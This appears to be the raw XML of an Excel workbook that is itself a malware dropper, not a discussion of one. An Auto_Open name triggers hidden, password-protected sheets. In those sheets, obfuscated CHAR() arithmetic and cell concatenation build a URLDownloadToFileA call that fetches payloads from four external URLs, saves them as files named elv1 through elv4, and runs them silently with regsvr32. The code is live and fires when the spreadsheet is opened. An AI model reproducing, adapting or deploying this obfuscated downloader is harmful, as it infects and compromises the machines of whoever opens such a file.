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name="Excel_BuiltIn_Auto_Open" vbProcedure="false">Sheet7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X</t>
  </si>
  <si>
    <t xml:space="preserve">h</t>
  </si>
  <si>
    <t xml:space="preserve">d</t>
  </si>
  <si>
    <t xml:space="preserve">p</t>
  </si>
  <si>
    <t xml:space="preserve">"</t>
  </si>
  <si>
    <t xml:space="preserve">:</t>
  </si>
  <si>
    <t xml:space="preserve">=</t>
  </si>
  <si>
    <t xml:space="preserve">,</t>
  </si>
  <si>
    <t xml:space="preserve">\</t>
  </si>
  <si>
    <t xml:space="preserve">C</t>
  </si>
  <si>
    <t xml:space="preserve">A</t>
  </si>
  <si>
    <t xml:space="preserve">.</t>
  </si>
  <si>
    <t xml:space="preserve">L</t>
  </si>
  <si>
    <t xml:space="preserve">&amp;</t>
  </si>
  <si>
    <t xml:space="preserve">(</t>
  </si>
  <si>
    <t xml:space="preserve">U</t>
  </si>
  <si>
    <t xml:space="preserve">-</t>
  </si>
  <si>
    <t xml:space="preserve">)</t>
  </si>
  <si>
    <t xml:space="preserve">T</t>
  </si>
  <si>
    <t xml:space="preserve">/</t>
  </si>
  <si>
    <t xml:space="preserve">R</t>
  </si>
  <si>
    <t xml:space="preserve">E</t>
  </si>
  <si>
    <t xml:space="preserve">N</t>
  </si>
  <si>
    <t xml:space="preserve">RETUR</t>
  </si>
  <si>
    <t xml:space="preserve">()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680</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>171360</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>20</xdr:col>
      <xdr:colOff>574200</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>47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212440" y="1009440"/>
          <a:ext cx="801036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96484375" defaultRowHeight="15" zeroHeight="false" outlineLevelRow="0" outlineLevelCol="0"/>
  <cols>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="21" min="20" style="0" width="9.14"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="23" min="23" style="0" width="9.14"/>
  </cols>
  <sheetData>
    <row r="1" customFormat="false" ht="18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8" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="G8" s="2" t="str">
        <f aca="false">T(Sheet3!L30&amp;Sheet3!F24&amp;Sheet3!N14&amp;Sheet3!A4&amp;Sheet3!E2)</f>
        <v>("url</v>
      </c>
    </row>
    <row r="18" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="M18" s="2" t="str">
        <f aca="false">T(Sheet3!Q6&amp;Sheet3!R17&amp;Sheet3!B11&amp;Sheet3!F24&amp;Sheet3!F26&amp;Sheet3!F24&amp;Sheet3!L7&amp;Sheet3!K10&amp;Sheet3!M16&amp;Sheet3!Q11&amp;Sheet3!R17&amp;Sheet3!I3&amp;Sheet3!B11&amp;Sheet3!E2&amp;Sheet3!R17&amp;Sheet3!T9&amp;Sheet3!M8&amp;Sheet3!T4&amp;Sheet3!R17&amp;Sheet3!K2&amp;Sheet3!S13)</f>
        <v>mon","URLDownloadToFi</v>
      </c>
    </row>
    <row r="21" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C21" s="2" t="str">
        <f aca="false">T(Sheet3!S2&amp;Sheet3!F24&amp;Sheet3!F26&amp;Sheet3!F24&amp;Sheet3!M4&amp;Sheet3!M4&amp;Sheet3!O3&amp;Sheet3!O3&amp;Sheet3!L13&amp;Sheet3!L13&amp;Sheet3!F24)</f>
        <v>A","JJCCBB"</v>
      </c>
    </row>
    <row r="31" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="G31" s="2" t="str">
        <f aca="false">T(Sheet5!K10&amp;Sheet5!K13&amp;Sheet5!D17)</f>
        <v>s://datie-tw.com/img/O8G0RDZj7MYCuJyPoP/","</v>
      </c>
      <c r="L31" s="2" t="str">
        <f aca="false">T(Sheet5!P10&amp;Sheet5!P13&amp;Sheet5!D17)</f>
        <v>s://copunupo.ac.zm/cgi-bin/WFFcGx/","</v>
      </c>
    </row>
    <row r="33" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="J33" s="2" t="str">
        <f aca="false">T(Sheet5!N10&amp;Sheet5!N13&amp;Sheet5!D17)</f>
        <v>://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/","</v>
      </c>
      <c r="N33" s="2" t="str">
        <f aca="false">T(Sheet5!R10&amp;Sheet5!R13&amp;Sheet5!D17)</f>
        <v>://ly.yjlianyi.top/wp-admin/4cChao/","</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection sheet="true" password="cc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8" hidden="false" customHeight="true" outlineLevel="0" collapsed="false"/>
    <row r="2" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="E2" s="2" t="str">
        <f aca="false">CHAR(216/2)</f>
        <v>l</v>
      </c>
      <c r="K2" s="2" t="str">
        <f aca="false">CHAR(35*2)</f>
        <v>F</v>
      </c>
      <c r="S2" s="2" t="str">
        <f aca="false">CHAR(100-35)</f>
        <v>A</v>
      </c>
    </row>
    <row r="3" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="B3" s="2" t="str">
        <f aca="false">CHAR(236-118)</f>
        <v>v</v>
      </c>
      <c r="I3" s="2" t="str">
        <f aca="false">CHAR(238/2)</f>
        <v>w</v>
      </c>
      <c r="O3" s="2" t="str">
        <f aca="false">CHAR(134/2)</f>
        <v>C</v>
      </c>
      <c r="U3" s="2" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="4" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A4" s="2" t="str">
        <f aca="false">CHAR(228/2)</f>
        <v>r</v>
      </c>
      <c r="F4" s="2" t="s">
        <v>0</v>
      </c>
      <c r="M4" s="2" t="str">
        <f aca="false">CHAR(148/2)</f>
        <v>J</v>
      </c>
      <c r="Q4" s="2" t="n">
        <v>1</v>
      </c>
      <c r="T4" s="2" t="str">
        <f aca="false">CHAR(42*2)</f>
        <v>T</v>
      </c>
    </row>
    <row r="5" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="J5" s="2" t="str">
        <f aca="false">CHAR(52*2)</f>
        <v>h</v>
      </c>
      <c r="S5" s="2" t="str">
        <f aca="false">CHAR(100/2)</f>
        <v>2</v>
      </c>
    </row>
    <row r="6" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="D6" s="2" t="str">
        <f aca="false">CHAR(185-110)</f>
        <v>K</v>
      </c>
      <c r="Q6" s="2" t="str">
        <f aca="false">CHAR(220-111)</f>
        <v>m</v>
      </c>
    </row>
    <row r="7" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="L7" s="2" t="str">
        <f aca="false">CHAR(170/2)</f>
        <v>U</v>
      </c>
      <c r="V7" s="2" t="str">
        <f aca="false">CHAR(224/2)</f>
        <v>p</v>
      </c>
    </row>
    <row r="8" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="G8" s="2" t="str">
        <f aca="false">CHAR(109-40)</f>
        <v>E</v>
      </c>
      <c r="M8" s="2" t="str">
        <f aca="false">CHAR(200-100)</f>
        <v>d</v>
      </c>
      <c r="P8" s="2" t="str">
        <f aca="false">CHAR(232/2)</f>
        <v>t</v>
      </c>
    </row>
    <row r="9" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="T9" s="2" t="str">
        <f aca="false">CHAR(194/2)</f>
        <v>a</v>
      </c>
    </row>
    <row r="10" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="F10" s="2" t="str">
        <f aca="false">CHAR(203-102)</f>
        <v>e</v>
      </c>
      <c r="K10" s="2" t="str">
        <f aca="false">CHAR(164-82)</f>
        <v>R</v>
      </c>
    </row>
    <row r="11" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="B11" s="2" t="str">
        <f aca="false">CHAR(220/2)</f>
        <v>n</v>
      </c>
      <c r="H11" s="2" t="n">
        <v>4</v>
      </c>
      <c r="O11" s="2" t="str">
        <f aca="false">CHAR(96/2)</f>
        <v>0</v>
      </c>
      <c r="Q11" s="2" t="str">
        <f aca="false">CHAR(136/2)</f>
        <v>D</v>
      </c>
    </row>
    <row r="13" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="H13" s="2" t="str">
        <f aca="false">CHAR(166/2)</f>
        <v>S</v>
      </c>
      <c r="L13" s="2" t="str">
        <f aca="false">CHAR(33*2)</f>
        <v>B</v>
      </c>
      <c r="S13" s="2" t="str">
        <f aca="false">CHAR(210/2)</f>
        <v>i</v>
      </c>
    </row>
    <row r="14" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="E14" s="2" t="str">
        <f aca="false">CHAR(240-120)</f>
        <v>x</v>
      </c>
      <c r="F14" s="2" t="n">
        <v>3</v>
      </c>
      <c r="N14" s="2" t="str">
        <f aca="false">CHAR(217-100)</f>
        <v>u</v>
      </c>
    </row>
    <row r="15" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="I15" s="2" t="s">
        <v>1</v>
      </c>
      <c r="P15" s="2" t="str">
        <f aca="false">CHAR(202-103)</f>
        <v>c</v>
      </c>
    </row>
    <row r="16" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C16" s="2" t="str">
        <f aca="false">CHAR(206-103)</f>
        <v>g</v>
      </c>
      <c r="M16" s="2" t="str">
        <f aca="false">CHAR(152-76)</f>
        <v>L</v>
      </c>
      <c r="T16" s="2" t="str">
        <f aca="false">CHAR(242/2)</f>
        <v>y</v>
      </c>
    </row>
    <row r="17" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="F17" s="2" t="s">
        <v>2</v>
      </c>
      <c r="G17" s="2" t="s">
        <v>3</v>
      </c>
      <c r="R17" s="2" t="str">
        <f aca="false">CHAR(212-101)</f>
        <v>o</v>
      </c>
    </row>
    <row r="18" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="O18" s="2" t="str">
        <f aca="false">CHAR(230/2)</f>
        <v>s</v>
      </c>
    </row>
    <row r="21" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="U21" s="2" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="24" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="F24" s="2" t="s">
        <v>4</v>
      </c>
      <c r="H24" s="2" t="s">
        <v>5</v>
      </c>
      <c r="L24" s="2" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="26" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="F26" s="2" t="s">
        <v>7</v>
      </c>
      <c r="H26" s="2" t="s">
        <v>8</v>
      </c>
      <c r="L26" s="2" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="27" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="L27" s="2" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="28" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="F28" s="2" t="str">
        <f aca="false">CHAR(32)</f>
        <v> </v>
      </c>
      <c r="H28" s="2" t="s">
        <v>11</v>
      </c>
      <c r="L28" s="2" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="29" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="F29" s="2" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="30" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="L30" s="2" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="31" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="F31" s="2" t="s">
        <v>15</v>
      </c>
      <c r="H31" s="2" t="s">
        <v>16</v>
      </c>
      <c r="L31" s="2" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="32" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C32" s="2" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="33" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="H33" s="2" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="36" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="E36" s="2" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="38" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C38" s="2" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="42" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="E42" s="2" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="44" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="G44" s="2" t="s">
        <v>23</v>
      </c>
      <c r="J44" s="2" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="46" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="H46" s="2" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="50" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="L50" s="2" t="s">
        <v>25</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection sheet="true" password="cc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4" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="Q4" s="2" t="str">
        <f aca="false">T(Sheet3!H28&amp;Sheet3!H28&amp;Sheet3!H26)</f>
        <v>..\</v>
      </c>
    </row>
    <row r="7" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="G7" s="2" t="str">
        <f aca="false">T("System32\")</f>
        <v>System32\</v>
      </c>
    </row>
    <row r="11" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="B11" s="2" t="str">
        <f aca="false">T(Sheet3!F14&amp;Sheet3!S5&amp;Sheet3!H28&amp;Sheet3!F10&amp;Sheet3!E14)</f>
        <v>32.ex</v>
      </c>
    </row>
    <row r="12" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="M12" s="2" t="str">
        <f aca="false">T(Sheet3!F28&amp;Sheet3!H28&amp;Sheet3!H28&amp;Sheet3!H26)</f>
        <v> ..\</v>
      </c>
    </row>
    <row r="17" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="I17" s="2" t="str">
        <f aca="false">T(Sheet3!F10&amp;Sheet3!C16&amp;Sheet3!O18&amp;Sheet3!B3)</f>
        <v>egsv</v>
      </c>
    </row>
    <row r="19" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="S19" s="2" t="str">
        <f aca="false">T(Sheet3!F24&amp;Sheet3!F26&amp;Sheet3!O11&amp;Sheet3!F26&amp;Sheet3!O11&amp;Sheet3!L31)</f>
        <v>",0,0)</v>
      </c>
    </row>
    <row r="23" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="I23" s="2" t="str">
        <f aca="false">T(":\Windows\")</f>
        <v>:\Windows\</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection sheet="true" password="cc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8" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="K8" s="2" t="n">
        <v>1</v>
      </c>
      <c r="N8" s="2" t="n">
        <v>2</v>
      </c>
      <c r="P8" s="2" t="n">
        <v>3</v>
      </c>
      <c r="R8" s="2" t="n">
        <v>54</v>
      </c>
    </row>
    <row r="10" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="K10" s="2" t="str">
        <f aca="false">TEXT("s://datie-tw.com/im",85655737776)</f>
        <v>s://datie-tw.com/im</v>
      </c>
      <c r="N10" s="2" t="str">
        <f aca="false">TEXT("://sbm.xinmoshiwang.c",486764645636)</f>
        <v>://sbm.xinmoshiwang.c</v>
      </c>
      <c r="P10" s="2" t="str">
        <f aca="false">TEXT("s://copunupo.ac.z",63532144546547)</f>
        <v>s://copunupo.ac.z</v>
      </c>
      <c r="R10" s="2" t="str">
        <f aca="false">TEXT("://ly.yjlianyi.top/w",5476474552464)</f>
        <v>://ly.yjlianyi.top/w</v>
      </c>
    </row>
    <row r="13" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="K13" s="2" t="str">
        <f aca="false">TEXT("g/O8G0RDZj7MYCuJyPoP/",8675614536)</f>
        <v>g/O8G0RDZj7MYCuJyPoP/</v>
      </c>
      <c r="N13" s="2" t="str">
        <f aca="false">TEXT("om/upload/VaOfWEb3pW76UO/",25635454633)</f>
        <v>om/upload/VaOfWEb3pW76UO/</v>
      </c>
      <c r="P13" s="2" t="str">
        <f aca="false">TEXT("m/cgi-bin/WFFcGx/",15565463264)</f>
        <v>m/cgi-bin/WFFcGx/</v>
      </c>
      <c r="R13" s="2" t="str">
        <f aca="false">TEXT("p-admin/4cChao/",46435233535)</f>
        <v>p-admin/4cChao/</v>
      </c>
    </row>
    <row r="17" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="D17" s="2" t="str">
        <f aca="false">T(Sheet3!F24&amp;Sheet3!F26&amp;Sheet3!F24)</f>
        <v>","</v>
      </c>
    </row>
    <row r="22" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="H22" s="2" t="str">
        <f aca="false">T(Sheet3!F26&amp;Sheet3!O11&amp;Sheet3!F26&amp;Sheet3!F24&amp;Sheet3!I15&amp;Sheet3!P8&amp;Sheet3!P8&amp;Sheet3!G17)</f>
        <v>,0,"http</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection sheet="true" password="cc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5" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="M5" s="2" t="str">
        <f aca="false">T(Sheet3!F10&amp;Sheet3!E2&amp;Sheet3!B3&amp;Sheet3!F14&amp;Sheet3!H28&amp;Sheet3!R17&amp;Sheet3!R17&amp;Sheet3!R17&amp;Sheet3!P15&amp;Sheet3!P15&amp;Sheet3!P15&amp;Sheet3!E14&amp;Sheet3!E14&amp;Sheet3!E14)</f>
        <v>elv3.ooocccxxx</v>
      </c>
    </row>
    <row r="9" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="F9" s="2" t="str">
        <f aca="false">T(Sheet3!F10&amp;Sheet3!E2&amp;Sheet3!B3&amp;Sheet3!Q4&amp;Sheet3!H28&amp;Sheet3!R17&amp;Sheet3!R17&amp;Sheet3!R17&amp;Sheet3!P15&amp;Sheet3!P15&amp;Sheet3!P15&amp;Sheet3!E14&amp;Sheet3!E14&amp;Sheet3!E14)</f>
        <v>elv1.ooocccxxx</v>
      </c>
    </row>
    <row r="12" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="O12" s="2" t="str">
        <f aca="false">T(Sheet3!F10&amp;Sheet3!E2&amp;Sheet3!B3&amp;Sheet3!H11&amp;Sheet3!H28&amp;Sheet3!R17&amp;Sheet3!R17&amp;Sheet3!R17&amp;Sheet3!P15&amp;Sheet3!P15&amp;Sheet3!P15&amp;Sheet3!E14&amp;Sheet3!E14&amp;Sheet3!E14)</f>
        <v>elv4.ooocccxxx</v>
      </c>
    </row>
    <row r="16" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="J16" s="2" t="str">
        <f aca="false">T(Sheet3!F10&amp;Sheet3!E2&amp;Sheet3!B3&amp;Sheet3!S5&amp;Sheet3!H28&amp;Sheet3!R17&amp;Sheet3!R17&amp;Sheet3!R17&amp;Sheet3!P15&amp;Sheet3!P15&amp;Sheet3!P15&amp;Sheet3!E14&amp;Sheet3!E14&amp;Sheet3!E14)</f>
        <v>elv2.ooocccxxx</v>
      </c>
    </row>
    <row r="24" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="S24" s="2" t="str">
        <f aca="false">T(Sheet3!F28&amp;Sheet3!H33&amp;Sheet3!H13)</f>
        <v> /S</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection sheet="true" password="cc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5" zeroHeight="false" outlineLevelRow="0" outlineLevelCol="0"/>
  <cols>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="4" min="4" style="0" width="6.99"/>
    <col collapsed="false" customWidth="true" hidden="true" outlineLevel="0" max="5" min="5" style="0" width="6.99"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="6" min="6" style="0" width="6.99"/>
  </cols>
  <sheetData>
    <row r="7" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="E7" s="0" t="e">
        <f aca="false">E28=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ydar</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Gydar</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-10T07:26:07Z</dcterms:modified>
  <cp:revision>0</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>